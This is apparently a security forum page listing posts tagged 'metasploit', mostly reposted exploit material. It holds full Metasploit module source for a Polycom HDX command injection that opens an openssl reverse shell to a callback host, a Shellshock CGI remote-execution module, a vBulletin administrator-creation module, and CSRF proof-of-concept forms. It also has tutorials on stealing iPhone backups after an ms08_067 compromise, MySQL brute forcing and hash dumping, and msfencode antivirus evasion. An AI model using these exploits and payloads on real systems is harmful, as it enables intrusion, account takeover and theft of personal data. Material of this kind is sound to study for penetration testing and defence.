Search the Community
Showing results for tags 'metasploit'.
-
Venom psh-cmd-exe persistence payload Tutorial-By Spirit Hello guys I am Spirited wolf as you all know and today i'm here to demonstrate a tutorial on Persistence using Metasploit-Framework. So, for this we will use the Venom-The Shellcode Generator for this ================================ Tutorial Link:: Venom Tutorial link ================================== So, Venom is a toolkit designed by my friend and it's really very awesome toolkit You can download it from here:: https://sourceforge.net/projects/crisp-shellcode-generator/ (Point to remember :: The Version that i am using is currently in Developer Stage you can't download it) ====================================================== This Tutorial is for educational purpose only , I'll not be responsible for any Harm. ====================================================== Please Subscribe My Channel If you like it:: www.youtube.com/c/Pentestingwithspirit Please Like My Facebook Page:: www.facebook.com/Pentestingwithspirit Follow me on Twitter:: @spirit3113
- 1 reply
-
- venom
- pentesting
-
(and 1 more)
Tagged with:
-
Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', 'Description' => %q{ Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. }, 'Author' => [ 'Mumbai', # 'staaldraad', # https://twitter.com/_staaldraad/ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass 'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them ], 'References' => [ ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] ], 'DisclosureDate' => 'Nov 12 2017', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [[ 'Automatic', {} ]], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ]) end def check connect Rex.sleep(1) res = sock.get_once disconnect if !res && !res.empty? return Exploit::CheckCode::Unknown elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") end # # Obtain banner information # sock = connect Rex.sleep(2) banner = sock.get_once vprint_status("Received #{banner.length} bytes from service") vprint_line("#{banner}") if banner =~ /password/i print_status("Authentication enabled on device, authenticating with target...") if datastore['PASSWORD'].nil? print_error("#{peer} - Please supply a password to authenticate with") return end # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. sock.put("#{datastore['PASSWORD']}\n") res = sock.get_once if res =~ /Polycom/ print_good("#{peer} - Authenticated successfully with target.") elsif res =~ /failed/ print_error("#{peer} - Invalid credentials for target.") return end elsif banner =~ /Polycom/ # praise jesus print_good("#{peer} - Device has no authentication, excellent!") end do_payload(sock) end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" sock.put(cmd) if datastore['VERBOSE'] Rex.sleep(2) resp = sock.get_once vprint_status("Received #{resp.length} bytes in response") vprint_line(resp) end # Give time for our command to be queued and executed 1.upto(5) do Rex.sleep(1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == 'local' comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) self.service.on_client_connect_proc = proc { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.is_a?(Rex::Service) if self.service.is_a?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html
-
Salut. Are cineva cont pe https://ininjas.com/forum/index.php?topic=4050 ??? Registrationul e disabled momentan din pacate. Ironman nu prea se mai ocupa din ce am inteles. De la iphone 5 incoace le-au cam damageuit repourile lor. Nici websitul in sine nu poate fi accesat; da o eroare de contionous loop.
- 3 replies
-
- ininjas
- iphone jailbreak
-
(and 2 more)
Tagged with:
-
This Metasploit module exploits the shellshock vulnerability in apache cgi. It allows you to execute any metasploit payload you want. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Shellshock Bashed CGI RCE', 'Description' => %q{ This module exploits the shellshock vulnerability in apache cgi. It allows you to excute any metasploit payload you want. }, 'Author' => [ 'Stephane Chazelas', # vuln discovery 'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-6271' ] ], 'Payload' => { 'BadChars' => "", }, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 13 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , OptString.new('FILEPATH', [true, 'The url ', '/tmp']) ], self.class) end def exploit @payload_name = "#{rand_text_alpha(5)}" full_path = datastore['FILEPATH'] + '/' + @payload_name payload_exe = generate_payload_exe if payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload") end peer = "#{rhost}:#{rport}" print_status("#{peer} - Creating payload #{full_path}") res = send_request_cgi({ 'method' => 'GET', 'uri' => datastore['TARGETURI'], 'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\"" }) end end Source: http://dl.packetstormsecurity.net/1410-exploits/shellshock_rce.rb.txt
-
- cgi
- metasploit
-
(and 3 more)
Tagged with:
-
# Exploit Title: Metasploit Project initial User Creation CSRF # Google Dork: N/A # Date: 14-2-2015 # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh) # Vendor Homepage: http://www.metasploit.com/ # Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp # Version: Free/Pro < 4.11.1 (Update 2015021901) # Tested on: All OS # CVE : N/A Vulnerability: Cross Site Request Forgery - (CSRF) Info: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) More Details: After doing some research, i have found that the anti csrf token "authenticity_token" value is not validated from the local server side which will result in a more csrf attack scenario around the whole local metasploit project. Affected URL(s)/PoC Code(s): -Change Local Metasploit Project User Settings <html> <body> <form action="https://127.0.0.1:3790/users/1" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="_method" value="put" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[fullname]" value="Attacker" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Save Settings" /> <input type="submit" value="Submit form" /> </form> </body> </html> -Full Local Metasploit Project Account Takeover before setting up the first user settings <html> <body> <form action="https://127.0.0.1:3790/users" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[username]" value="Username" /> <input type="hidden" name="user[password]" value="PASSWORD" /> <input type="hidden" name="user[password_confirmation]" value="PASSWORD" /> <input type="hidden" name="user[fullname]" value="FUll_Name" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Create Account" /> <input type="submit" value="Submit form" /> </form> </body> </html> More Details/Impact: -Change Local Metasploit Project User Settings -Full Local Metasploit Project Account Takeover before setting up the first user settings Report Timeline: [-] 14/02/2015: Reported to Rapid7 Security Team [-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability [-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public disclosure rules [-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010 [-] 16/03/2015: Public Disclosure Thanks -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://goo.gl/cNrVpL> <https://www.linkedin.com/in/symbiansymoh>Facebook <https://fb.com/symbiansymoh>Twitter <https://twitter.com/symbiansymoh> Source
-
- local
- metasploit
-
(and 3 more)
Tagged with:
-
Using a combination of vulnerabilities in the Google Play store and the Android stock browser, attackers can install malicious apps remotely on some Android devices. The attack is the result of a failure on the part of Google’s Play Store Web application to completely enforce the X-Frame-Options header, a common defense against clickjacking and other attacks. Researchers at Rapid7 discovered that combining that weakness with an XSS flaw in another area of the Play Store, or a universal XSS in some Android browsers can allow an attacker to install and launch apps. Developers at the Metasploit Project have added a module to the Metasploit Framework that can exploit these vulnerabilities on some Android devices. This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection,” the documentation from Metasploit says. “As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device.” Tod Beardsley of Rapid7 said in a blog post about the attack that users on vulnerable platforms who are always logged in to common Google services are especially at risk. “Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the the ones most at risk. Other browsers may also be affected,” he said. The module to exploit this attack is in Metasploit now, a circumstance that often is a precursor to a wave of attacks on a targeted vulnerability. Source
-
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. Module Name auxiliary/admin/http/vbulletin_upgrade_admin Authors Unknown juan vazquez <juan.vazquez [at] metasploit.com> References URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst URL: Dangerous vBulletin exploit in the wild URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf > use auxiliary/admin/http/vbulletin_upgrade_admin msf auxiliary(vbulletin_upgrade_admin) > show actions ...actions... msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name> msf auxiliary(vbulletin_upgrade_admin) > show options ...show and set options... msf auxiliary(vbulletin_upgrade_admin) > run Development Source Code ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Administrator Account Creation', 'Description' => %q{ This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. }, 'Author' => [ 'Unknown', # Vulnerability discoverer? found in the wild 'juan vazquez' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5'] ], 'DisclosureDate' => 'Oct 09 2013')) register_options( [ OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']), OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']), OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']), OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc']) ], self.class) end def user datastore["USERNAME"] end def pass datastore["PASSWORD"] end def run if user == pass print_error("#{peer} - Please select a password different than the username") return end print_status("#{peer} - Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'method' =>'POST', 'vars_post' => { "version" => "install", "response" => "true", "checktable" => "false", "firstrun" => "false", "step" => "7", "startat" => "0", "only" => "false", "options[skiptemplatemerge]" => "0", "reponse" => "yes", "htmlsubmit" => "1", "htmldata[username]" => user, "htmldata[password]" => pass, "htmldata[confirmpassword]" => pass, "htmldata[email]" => datastore["EMAIL"] }, 'headers' => { "X-Requested-With" => "XMLHttpRequest" } }) if res and res.code == 200 and res.body =~ /Administrator account created/ print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => user, :pass => pass, :active => true, :proof => res.body ) else print_error("#{peer} - Admin account creation failed") end end end History vBulletin Administrator Account Creation | Rapid7
- 1 reply
-
- administrator
- creation
-
(and 3 more)
Tagged with:
-
Windows Gather Screen Spy Module In Metasploit http://www.youtube.com/watch?feature=player_embedded&v=0WeTUBS0yQI#! Description: This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name will be appended directly on to the end of the value of VIEW_CMD. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: https://www.youtube.com/watch?v=0WeTUBS0yQI Surs?: Windows Gather Screen Spy Module In Metasploit
-
- backtrack 5
- metasploit
-
(and 2 more)
Tagged with:
-
Metasploit provide some MySQL database auxiliary modules who will permit you to scan the running version, do brute force login, execute sql queries and gather some useful informations. You can find all these auxiliary modules through the Metasploit search command. MySQL version scanner (mysql_version) To invoke this auxiliary module just type the following command : Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable. MySQL authentication brute force login (mysql_login) To invoke this auxiliary module just type the following command : This module attempts to authenticate against a MySQL instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit doesn’t provide default “USER_FILE“, default “PASS_FILE” and default “USERPASS_FILE“. You can use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file. Valid login attempts are displayed in green and non valid in red. MySQL generic SQL query execution (mysql_sql) To invoke this auxiliary module just type the following command : This module will allow you to execute a simple SQL query against a MySQL instance. The default SQL query will check the running version of MySQL database. You will require valid login and password previously discovered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address. Some useful SQL MySQL queries for pen testing are available on pentestmonkey website. MySQL password hashdump (mysql_hashdump) To invoke this auxiliary module just type the following command : Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize scans, just increase the number of concurrent threads by setting the “THREADS” variable. You also need to have valid “USERNAME” and “PASSWORD“, maybe obtained through the “mysql_login” auxiliary module. MySQL enumeration (mysql_enum) To invoke this auxiliary module just type the following command : This auxiliary module will allow you to gather useful informations from a MySQL server : The MySQL version The MySQL OS compilation target The server architecture The server hostname The MySQL datas directory location If logging of queries and logins is activated or not, and log files location If the old password hashing algorithm support is activated or not If local files loading (infile) is activated or not If logins with old Pre-4.1 passwords is authorized or not If the “–skip-grant-tables” option is activated or not If symlinks are authorized to be used for database files If table merges are allowed If the “–safe-show-database” option is activated or not If SSL connexions are enabled or not All accounts with their password hashes List of accounts that can log in with SSL if SSL is enabled List of all accounts with “GRANT“, ”CREATE USER”, “RELOAD“, ”SHUTDOWN“, “SUPER“, “FILE” and “PROCESS” privileges. List of all accounts with “SELECT“, “INSERT“, “UPDATE“, “DELETE“, “CREATE” and “DROP” privileges. List of all anonymous accounts. List of all accounts without passwords List of all accounts with host wildcard authorized access. To use this auxiliary module you need to have a access to the database with a privileges user account, maybe gathered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.
-
Introduction to iPhone Backups: iTunes is used to back up the iPhone data to a computer. iTunes backup makes a copy of everything on the device like contacts, SMS, photos, calendar, music, call logs, configuration files, database files, keychain, network settings, offline web application cache, safari bookmarks, cookies and application data, etc. It also backups the device details like serial number, UDID, SIM hardware number and the phone number. Normal Backups: When the iPhone is connected to a computer for the first time and synced with iTunes, iTunes automatically creates a folder with device UDID (Unique device ID – 40 hexadecimal characters long) as the name and copies the device contents to the newly created folder. If the automatic sync option is turned off in iTunes, the user has to manually initiate the backup process whenever the device is connected to the computer. iTunes also initiates an automated backup when the iPhone is updated or restored. iTunes backup location varies for different operating systems and the exact directory paths are listed in Table-1. If a passcode protected iPhone is connected to the computer for the first time, iTunes will require the user to enter the passcode and unlock the device before starting the sync process. Upon unlocking the iPhone with a valid passcode, iTunes recognizes the device as authorized and allows to backup and sync with the computer. From there on, iTunes will allow to backup or sync the iPhone without entering the passcode as long as it connects to the same computer. Encrypted Backups: iTunes also provide an option to create encrypted backups. To create encrypted backups, connect the device to the computer and select ‘Encrypt iPhone Backup’ option in iTunes. During the encrypted backup, iTunes prompt the user to enter a password. Later the password is used to encrypt all the files in the backup. Backup folder contains a list of files which are not in a readable format and it consists of uniquely named files with a 40 digit alphanumeric hex value without any file extension. Example file name is: f968421bd39a938ba456ef7aa096f8627662b74a. This 40 digit hex file name in the backup folder is the SHA1 hash value of the file path appended to the respective domain name with a ‘-‘ symbol. So the hash of DomainName-filepath will match to the correct file in the backup. In iOS 5, applications and inside data are classified into 12 domains (11 system domains and one application domain). The list of system domains can be viewed from /System/Library/Backup/Domains.plist file on the iPhone. Example: Address book images backup file is – cd6702cea29fe89cf280a76794405adb17f9a0ee and this value is computed from SHA-1 (HomeDomain-Library/AddressBook/AddressBookImages.sqlitedb). *Online hash calculator – Hash: online hash value calculator iTunes stores/reads the domain names and path names from Manifest.mbdb meta file. Manifest.mbdb is a binary file that contains information about all other files in the backup along with the file sizes and file system structure data. Backup file structure in older version of iTunes is managed by two files – Manifest.mbdx and Manifest.mbdb. In which, Manifest.mbdx file acts as an index file for the backup and indexes the elements that will be found in Manifest.mbdb. Since the introduction of iTunes 10, index file (mbdx) is eliminated and the backup is managed by a single mbdb file. Manifest.Mbdb file header and record format is shown in below Tables. Header: Mbdb file header is a fixed value of 6 bytes and the value acts as a magic number to identify the mbdb files. Record: Mbdb file contain many records and each record is of variable size. Every record contains various details about a file. More technical details about iPhone backups is documented in my paper – Forensic analysis of iPhone backups Metasploit – Apple iOS Backup File Extraction module Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups. Below details outline the usage of updated Metasploit – Apple iOS Backup File Extraction module. I have used Metasploit 4.4 from Backtrack 5R1. Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability”. So in order to use the iOS backup module, first we have to compromise the system using some other vector. Usage Steps: 1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory. 2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory. 3. Open the Metasploit using msfconsole. 4. Use meterpreter as a payload and exploit a vulnerability in the target system. In my case, the victim machine is running with the Windows XP OS (192.168.209.128) which is vulnerable to ms08_067_netapi vulnerability. Following the below steps exploits the vulnerability and opens a meterpreter shell. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.209.128 RHOST => 192.168.209.128 msf exploit(ms08_067_netapi) > exploit 5. Once the meterpreter session is established, iOS backup on the victim machine can be dumped using the following command- > run post/multi/gather/apple_ios_backup The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup in the target system, it will displays ‘ No users found with an iTunes backup directory’ message. If it finds the backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory. Though Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing. Because all the files in the encrypted backup are encrypted with the user supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone. The post module can steal the iOS backups from Windows and Mac OS X machines. I have tested it for Windows. It should definitely work for OS X as well. Demonstration Video Sources: Stealing iPhone Backups using Metasploit | SecurityXploded Blog Metasploit post exploitation scripts to steal iOS 5 backups
-
Termenii Metasploit MSFconsole MSFcli Armitage MSFpayload MSFencode Metasploit e un tool valoros in pen testing, ce poate deveni destul de confuz pentru un incepator. Tutorialul asta despre metasploit te va ajuta sa rulezi metasploit. Probabil ca multe dintre tintele tale vor fi sisteme ce ruleaza pe Windows. Daca esti interesat, recomand sa citesti, Amazon.com: Metasploit: The Penetration Tester's Guide (9781593272883): David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni: Books O carte ce iti va arata cele mai multe dintre framework-urile metasploit, ce te lasa sa descoperi singur adevarata "putere" a metasploit. In orice caz, chiar o recomand. 1. Termenii Metasploit Exploit - sa profiti de o bresa de securitate, in cadrul unui sistem, retea sau aplicatie. Payload - este codul pe care computerul victimei il va executa in framework-ul metasploit. Module - o mica parte de cod ce poate fi adaugata la framework-ul metasploit pentru a executa un atac. Shellcode - o mica parte de cod folosita ca payload. 2. MSFConsole Msfconsole este o interfata cu majoritatea caracteristicilor din metasploit. Msfconsle poate fi folosita pentru a porni atacuri, crearea de "listen-eri", si multe, multe altele. Vom folosi Msfconsole pe parcursul acestui tutorial. Metasploit vine instalat implicit pe backtrack 5. Pentru a accesa msfconsole, deschde terminalul si scrie: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfconsole Daca ai nevoie de ajutor, pentru a vedea fisierele "help", pur si simplu scrie help urmat de comanda despre care vrei sa afli mai multe. In cazul nostru, vrem sa aflam mai multe despre comanda connect. Aceasta ne permite sa comunicam cu un host. msf > help connect 3. MSFcli MSFcli este o alta cale de a accesa framework-ul metasploit dar se concentreaza mai mult pe scripting si interpretabilitate. Pentru a vedea mai multe despre msfcli: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfcli -h Acum sa-i facem un mic "test drive" la msfcli. Poti vedea optiunile intr-un modul adaugand litera O la sfarsit de linie. Spre exemplu: root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapt o Acest modul are nevoie de 3 optiuni: RHOST, RPORT, si SMPIPE. Adaugand P la sfarsit ne permite sa vedem ce payloads putem folosi. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 P Putem rula exploit-ul nostru selectand un payload, inserand optiunile, si rulandu`l punand litera E la sfarsit ca msfcli argument string. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PAYLOAD=windows/vncinject/reverse_tcp_dns E Nota: IP-ul selectat ca RHOST este un VPS ce ruleaza pe Windows Server. Acesta va reactiona ca sistemul victimei, pentru teste. Vei fi nevoit sa faci la fel, cu un alt computer sau masina virtuala. Pentru "antrenament", nu actualiza sistemul victimei, sau nu insta un antivirus. 4. Armitage 1. Ruleaza comanda armitage 2. Selecteaza Start MSF. Are GUI. 5. MSFpayload Componenta msfpayload a metasploit ce genereaza shellcode, si executa. Shellcode poate fi generat in mai multe feluri cum ar fi C, Ruby, JavaScript si chiar Visual Basic. Fiecare dintre acestea poate fi folositor in diverse situatii. Pentru ajutor in msfpayload poti scrie: root@bt~# msfpayload -h Precum msfcli, daca ai nevoie sa gasesti optiunile necesare, pune la sfarsitul liniei litera O. root@bt:~# msfpayload windows/shell_reverse_tcp O 6. MSFencode Shellcode-ul generat de msfpayload este functional, dar contine o gramada de caractere null care atunci cand sunt interpretate de majoritatea dintre programe, semnifica sfarsitul unui string, si asta va provoca codul pentru a termina inainte de compilare. In plus, shellcode-ul traverseaza o retea in cleartext ce paote fi preluat de sistemele de detectare a intruziunilor(IDSs) si programele antivirus. Pentru aceasta problema, dezvoltatorii Metasploit ofera msfencode, ce te ajuta sa eviti caracacterele defectuase si sa evite antivirusul si IDS-ul codificand payload-ul initial intr-un mod in care nu contine " "bad" characters ". Scrie, msfencode -h pentru o lista cu optiunile msfencode. Metasploit contine un numar de diferite encodari pentru situatii diferite. Unele vor fi folositoare can poti folosi numai caractere alfanumerice ca parte din payload, cum este in cazul formatului multor fisier sau alte aplicatii ce accepta numai caractere printabile ca input. Un foarte popular si bine cunoscut encoder este: x86/shikata_ga_nai. Pentru o lista cu encoderele disponibile, scrie, root@bt:~# msfencode -l Referinte Main Page - BackTrack Linux BackTrack Tutorials